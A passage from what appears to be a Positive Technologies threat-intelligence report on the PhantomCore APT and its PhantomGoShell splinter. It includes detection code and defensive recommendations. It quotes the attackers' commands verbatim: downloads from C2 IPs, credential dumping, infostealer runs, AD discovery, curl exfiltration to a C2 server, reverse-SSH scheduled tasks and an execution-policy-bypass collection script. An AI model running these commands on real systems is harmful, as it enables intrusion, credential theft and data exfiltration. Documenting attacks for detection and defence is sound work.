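	if strings.Contains(lower, "powershell") && strings.Contains(lower, "-windowstyle hidden") &&
		strings.Contains(lower, `c:\programdata\`) {
		rules = append(rules, "hidden_powershell_programdata")
	}
	return rules, task
}

// Constructed sample lines in the shape of the observed procedures (203.0.113.10 is a placeholder).
var SampleLines = []string{
	`schtasks /create /sc DAILY /tn SSH /tr \"C:\Windows\system32\OpenSSH\ssh.exe -o StrictHostKeyChecking=no -f -N -R 52213 -p 443 user@203.0.113.10\" /f /st 09:00`,
	`schtasks /create /sc DAILY /tn DNS /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\inetpub.exe' -ArgumentList 'run' -WindowStyle Hidden\" /f /st 10:00`,
	`ssh -o StrictHostKeyChecking=no -f -N -R 37124 -p 80 user@203.0.113.10`,
	`schtasks /create /sc DAILY /tn Backup /tr "C:\Tools\backup.exe --full" /st 02:00`,
	`ssh -p 22 admin@fileserver.corp.example`,
}

func main() {
	for _, l := range SampleLines {
		if rules, task := Classify(l); rules != nil {
			fmt.Printf("%v task=%q\n", rules, task)
		}
	}
}
```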


3. Credential Access

Tools:

  • XenArmor All-In-One Password Recovery Pro
  • PhantomStealer

Infrastructure:

188.127.254.234


Procedures:

  • Using PhantomTaskShell, which receives commands from the Phantom control panel, download the XenArmor All-In-One Password Recovery Pro utility from a payload staging server, extract it, run it on the infected system with the option that writes discovered and recovered authentication data to an HTML file, and then remove the utility from the system.

Downloading XenArmor All-In-One Password Recovery Pro

iwr -Uri "http://188.127.254.234:80/one.zip" -OutFile "C:\ProgramData\one.zip"


Extracting the utility

expand-archive -force -path C:\ProgramData\one.zip -destinationpath C:\ProgramData


Starting the utility with results written to an HTML file

C:\ProgramData\XenAllPasswordPro.exe -a C:\ProgramData\<redacted>.html


Deleting the utility

del C:\ProgramData\one.zip
del C:\ProgramData\XenAllPasswordPro.exe
  • Using PhantomTaskShell, which receives commands from the Phantom control panel, download the PhantomStealer sample from a payload staging server, extract it, and run it on the infected system with an option to copy authentication data saved in known web browsers, and remove the infostealer from the system.

Downloading PhantomStealer

iwr -Uri "http://188.127.254.234:80/browser.zip" -OutFile "C:\ProgramData\browser.zip"


Extracting PhantomStealer

expand-archive -force -path C:\ProgramData\browser.zip -destinationpath C:\ProgramData\


Starting PhantomStealer

C:\ProgramData\browser.exe chrome -c
cd C:\ProgramData; .\browser.exe yandex -c


Deleting PhantomStealer

del "C:\ProgramData\browser.exe"


4. Discovery, Lateral Movement

Tools:

  • PhantomTaskShell

Infrastructure:

185.130.249.224


Procedures (executed via the PhantomTaskShell backdoor, which receives tasks from the Phantom control panel):

Obtaining information about local users

whoami
quser


Obtaining information about Active Directory groups and users

net user
net user /domain
net user <redacted> /domain
net group /domain
net group \"Domain Admins\" /domain
<redacted>, <redacted> | ForEach-Object { net user $_ /domain }


Collecting OS and file system information

systeminfo
wmic logicaldisk get caption


Obtaining information about system processes and services

get-service
tasklist


Analyzing Windows Defender configuration

get-mppreference


Directory listing

dir S:\
dir C:\
dir C:\users\<redacted>
dir C:\users\<redacted>\documents
dir C:\users\<redacted>\downloads
dir C:\users\<redacted>\desktop
dir C:\Users\<redacted>\AppData\Roaming
dir C:\ProgramData
dir \"C:\Program Files (x86)\"
pwd


Analyzing the network environment and routing parameters

arp -a
ipconfig
route print
nestat -ano
nslookup 127.0.0.1
nslookup <redacted>.ru
ping 10.64.70.172 -n 1
ping <redacted> -n 2


Sending information about the infected system to the C2 server

C:\Windows\System32\curl.exe -v -F "file=@C:\ProgramData\user_report.txt" -F "destinationPath=./user_report.txt" http://185.130.249.224:80/upload

5. Collection, Exfiltration

Tools:

  • RClone
  • Mega.nz storage

Infrastructure:

195.133.32.213


Procedures:

  • Using PhantomTaskShell, which receives commands from the Phantom control panel, start the certutil.exe utility from Windows Certificate Services with the -urlcache and -f parameters to download an RClone sample and its configuration file from the C2 server on port 8000.

Downloading RClone

certutil.exe -urlcache -f "http://195.133.32.213:8000/srvhost.exe" "C:\ProgramData\srvhost.exe"


Downloading the configuration file

certutil.exe -urlcache -f "http://195.133.32.213:8000/wusa.conf" "C:\ProgramData\wusa.conf"
  • Using PhantomTaskShell, which receives commands from the Phantom control panel, download a sample of an unknown PowerShell script from port 80 of the C2 server and extract it (we could not obtain the script during the research):

Downloading the PowerShell script

iwr -Uri "http://188.127.254.234:80/load.zip" -OutFile "C:\\ProgramData\\load.zip"


Extracting the PowerShell script

expand-archive -force -path C:\ProgramData\load.zip -destinationpath C:\ProgramData\
  • Using PhantomTaskShell, which receives commands from the Phantom control panel, run the PowerShell script with the execution policy bypassed and the options -r (recursive search) and -e (list of file extensions) to collect Microsoft Office and text documents, image files, LNK files, and configuration files for RDP and OpenVPN connections.

Starting the PowerShell script

powershell -ex bypass C:\ProgramData\load.ps1 -Path C:\Users\ -r -e "pdf,xls,xlsx,doc,docx,txt,jpg,ovpn,rdp,lnk"
  • Deleting tools:

Deleting tools

del "C:\ProgramData\wusa.conf"
del "C:\ProgramData\srvhost.exe"
del "C:\ProgramData\load.ps1"
del "C:\ProgramData\load.zip"

Directories used to store tools:

C:\ProgramData\
C:\ProgramData\YandexCloud
C:\ProgramData\MicrosoftAppStore
C:\Windows\system32\OpenSSH


Tasks in the Windows Task Scheduler

Yandex Update
Microsoft Update
Update
SSH
DNS


Mimicking legitimate files in the tool names

ssh.exe
hosts.exe
inetpub.exe
srvhost.exe


Malicious files:

dnsclient.zip
dnsclient.bat
inetpub.zip
inetpub.exe
hosts.zip
hosts.exe
update.zip
update.ps1
remote.zip
remote.exe
remote.dll
load.zip
load.ps1
one.zip
one.exe
xenallpassword.exe
browser.zip
browser.exe
srvhost.exe
wusa.conf

Threat landscape

According to threat intelligence, at the time of publication PhantomCore had obtained access to 181 compromised hosts during its cyberespionage campaign. The first attack occurred on May 12, 2025, and activity peaked in June, with 56% of all infections occurring on June 30. On average, the group stayed in compromised networks for 24 days, with a maximum of 78 days. The group still controls 49 hosts.

Before non-tolerable events occurred, the PT ESC's Threat Intelligence team identified and notified victims in the following categories about the incident:

  • Government agencies
  • Defense sector organizations
  • Shipbuilding companies
  • Research institutes
  • Chemical industry companies
  • Mining companies
  • Manufacturing companies
  • IT companies

All identified victims are Russian organizations.

Indicators of a split within the group

In mid-April of this year—two weeks before the start of the described campaign—the threat intelligence team discovered a previously unseen reverse shell resembling other tools in PhantomCore's 2024 arsenal.

The new backdoor, dubbed PhantomGoShell, is written in Go, executes commands on a compromised Windows host via the command line interpreter, and shows logic- and code-level similarities to PhantomRAT and PhantomRShell (see the next section for a detailed analysis).

However, several indicators suggested the backdoor was being operated by low-skilled hackers outside PhantomCore's core team who had obtained a raw test tool from its toolkit.

1. Public sandboxes, errors, non-typical persistence and impact

The PhantomGoShell operators tested the backdoor using a free account on a public sandbox service, which allowed the threat intelligence team to observe the initial setup in real time, including the commands and their results.

During the first testing phase of the backdoor, the PhantomGoShell operators struggled with the C2 configuration.

Command-entry and C2-availability errors

After fixing the C2 server configuration, they executed commands on the infected VM to start the calculator and list running processes and the file system directories.

Starting the calculator
Listing of running processes
Directory listing

The PhantomGoShell operators then tested persistence on the infected host by modifying Windows registry keys and silently downloading, installing, and starting the remote administration utilities Remote Desktop Connection and AnyDesk.

Persistence in the system by modifying a Windows registry key
Starting RDP client
Installing and starting AnyDesk via PowerShell WebClient
Installing and starting AnyDesk using curl

After confirming these persistence techniques worked, the PhantomGoShell testers checked whether it was possible to open a large number of audio/video tabs in the browser and assessed memory usage in Windows Task Manager.

Repeated opening of browser tabs
Checking system load

Testing was performed only in the evening and nighttime hours (approximately 20:00–02:00 Moscow time) and involved repeatedly restarting public sandbox VMs with new backdoor samples.

2. Network infrastructure: non-typical URLs and backend

All detected PhantomGoShell samples communicated with a Russia-hosted C2 server running Waitress, a Python WSGI server.

C2 server fingerprint

Detected URL routes:

  • /<prefix>/connect: establish a connection
  • /<prefix>/command: obtain a command to run on the host
  • /<prefix>/send_output: send command output

The <prefix> parameter is hardcoded in detected samples.

Detected server:

193.124.117.89


3. PhantomGoShell: different procedures, reduced functionality

PhantomGoShell is a Go-based backdoor delivered as a PE file.

  • Persistence

Upon initial access, PhantomGoShell persists by self-replicating to the user's temporary directory:

C:\Users\<user>\AppData\Local\Temp


and by writing the path to the replicated executable to a Windows registry key while masquerading as the Discord messenger:

HKCU\CurrentVersion\Run\Discord
  • Discovery, Command and Control

Via WinAPI calls, PhantomGoShell obtains the hostname, generates a random 16-byte session ID and a session encryption key (key_encryption), and reads a hardcoded prefix.

Some PhantomGoShell samples do not call WinAPI functions for the hostname and instead use the hardcoded value "DESKTOP-DEV", indicating the tool is still in testing.

These parameters are serialized to JSON and sent to the C2 server:

POST /<prefix>/connect


The <prefix> parameter is hardcoded in detected samples.

120t9iITNhRIKaVyv54R1DQXRQJiTjHG

JSON object with data on the infected system
URL-building function
Sending JSON object via the /connect route

After the connection is established, commands and their outputs are exchanged between the C2 server and the infected host in encrypted form. The encryption key is the SHA-256 hash sum of the 16-byte session encryption key (key_encryption) generated during connection setup.

AES256_CBC_Decrypt(SHA256(key_encryption), command)

AES256_CBC_Encrypt(SHA256(key_encryption), command_result)


PhantomGoShell polls for commands to execute on the infected host every two seconds, sending requests that carry the previously generated 16-byte session ID in the X-Machine-Id HTTP header.

GET /<prefix>/command
X-Machine-Id: ID

Sending GET requests via the /command route

The C2 server responds with JSON where the cmd field contains the command to execute on the infected host, encrypted and base64-encoded.

JSON object with encrypted command

The command is decoded and decrypted.

Server command decryption function

The decrypted command is executed on the infected host via the command interpreter:

cmd /c <decrypted command>

Command execution function

The command output is encrypted, serialized to a JSON object with the output key, and sent with the 16-byte session ID in the X-Machine-Id HTTP header.

POST /<prefix>/send_output
X-Machine-Id: ID

JSON object with the command execution results
Encrypted command output
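An added example (not PhantomGoShell's code) of how an analyst can decode captured /command traffic once key_encryption has been recovered from a sample or a memory dump: it derives SHA-256(key_encryption) as the report describes and AES-256-CBC-decrypts the base64 cmd field. The report does not state the IV layout or padding scheme, so the block assumes a 16-byte IV prepended to the ciphertext and PKCS#7 padding; the key, IV and task are constructed values, and EncryptField exists only to build that sample.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
)

// SessionKey: SHA-256 over the 16-byte key_encryption, as the report describes.
func SessionKey(keyEncryption []byte) []byte {
	sum := sha256.Sum256(keyEncryption)
	return sum[:]
}

// DecryptField base64-decodes a "cmd"/"output" value and AES-256-CBC-decrypts it.
// Assumed (the report does not say): IV prepended to the ciphertext, PKCS#7 padding.
// A padding failure usually means a wrong key_encryption or a different IV layout.
func DecryptField(keyEncryption []byte, b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return "", fmt.Errorf("not base64 IV+CBC blocks: %v (len %d)", err, len(raw))
	}
	block, _ := aes.NewCipher(SessionKey(keyEncryption)) // 32-byte key, cannot fail
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", fmt.Errorf("bad PKCS#7 padding")
	}
	return string(pt[:len(pt)-n]), nil
}

// EncryptField is the inverse; used here only to build a constructed sample task.
func EncryptField(keyEncryption, iv []byte, plaintext string) string {
	block, _ := aes.NewCipher(SessionKey(keyEncryption))
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append([]byte(plaintext), bytes.Repeat([]byte{byte(pad)}, pad)...)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(padded, padded) // encrypt in place
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, iv...), padded...))
}

// DecodeTask parses a /<prefix>/command response body and returns the plaintext command.
func DecodeTask(keyEncryption, body []byte) (string, error) {
	var msg struct{ Cmd string `json:"cmd"` }
	if err := json.Unmarshal(body, &msg); err != nil {
		return "", err
	}
	return DecryptField(keyEncryption, msg.Cmd)
}

func main() {
	key, iv := []byte("0123456789abcdef"), []byte("fedcba9876543210") // constructed values
	body := fmt.Sprintf(`{"cmd":%q}`, EncryptField(key, iv, "whoami"))
	fmt.Println(DecodeTask(key, []byte(body))) // whoami <nil>
}
```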

Key characteristics:

  • Go executable
  • Single capability: execute commands via the command line interpreter
  • Hostname is the only host information collected
  • Implements persistence
  • No defense-evasion techniques
  • Random 16-byte encryption key
  • Encrypted information (AES-256-CBC)
  • Random 16-byte session ID
  • Session ID transmitted in an HTTP header
  • Hardcoded constant: prefix
  • Prefix used in URL
  • Hardcoded constant: hostname DESKTOP-DEV

4. Takeaways

Despite some similarities between PhantomGoShell and the PhantomRShell and PhantomRAT backdoors, PT ESC Threat Intelligence analysts assess that different actors are developing and using these tools, even though they share a common technical foundation.

Distinctive traits of PhantomGoShell samples include:

  • Simpler functionality
  • Different persistence directories
  • Different Windows registry keys for persistence
  • Different JSON structures
  • Different URL route formats
  • Code artifacts indicating active development and testing
  • Use of HTTP headers to identify compromised hosts
  • Encrypted data in transit

PhantomGoShell's infrastructure also stands out for its minimal footprint (a single server) and for using Waitress, a Python WSGI server not observed on PhantomRShell/PhantomRAT C2 infrastructure.

Behavioral patterns, timing, and overall activity of PhantomGoShell also differ from PhantomRShell and PhantomRAT operators:

  • Testing the backdoor in public sandboxes from free accounts at night
  • Configuration issues with the sole C2 server that took several days to resolve
  • A short window between discovering PhantomGoShell and the first cyberattacks using the PhantomRShell and PhantomRAT backdoors, insufficient for refactoring or evolution of the tools
  • No evidence of PhantomGoShell being used in real attacks or appearing in the group's observed toolkit

Moreover, the threat intelligence team determined that the unusual PhantomGoShell activity traces to Russian-speaking members of gaming Discord communities, some verifiably minors in Russia with limited attack experience, who received the backdoor source code and guidance from a member with a more established cybercriminal background.

We assess this group is a splinter outside the core: low-skilled operators recruited from gaming and Discord communities, organized as a separate cybercriminal "startup" by a PhantomCore core member with access to custom tool source code.

Conclusion

PhantomCore activity has been tracked since early 2024. It targets only Russia's critical infrastructure and is motivated by cyberespionage. The group runs large-scale operations while maintaining strong stealth—remaining invisible in victim networks for extended periods—enabled by continual updates and evolution of in-house offensive tools.

Effective defense against such persistent, sophisticated cyberattacks requires comprehensive solutions that combine established detection expertise with current threat intelligence.

The Positive Technologies Expert Security Center expects PhantomCore to continue posing a high threat to Russian organizations. PT ESC's Threat Intelligence team continues to monitor the APT group's activity, promptly alerts victims to planned cyberattacks, and provides unique threat intelligence to users of Positive Technologies products.

Recommendations

To defend against PhantomCore's attacks, our recommendations are to:

  • Use licensed antivirus solutions with up-to-date, regularly refreshed signature databases.
  • Scan email attachments from untrusted or suspicious senders with antivirus tools. Be cautious if there's no prior correspondence; the sender isn't a known counterparty; the domain is unusual; or the message stresses urgency, especially while invoking government agencies, regulators, or supervisory bodies.
  • Do not open password-protected archives or embedded files without scanning them first.
  • Disable hiding of file extensions and verify actual extensions: don't open files whose icon doesn't match the real extension; don't open files with multiple dot-separated extensions at the end of the name.
  • Provide regular employee training and exercises on safe email use and resisting social engineering.

Indicators of compromise

File-based IoCs

Network IoCs

MITRE ATT&CK matrix

Positive Technologies product verdicts

PT Sandbox

YARA rules

Behavioral verdicts

PT NAD and PT NGFW
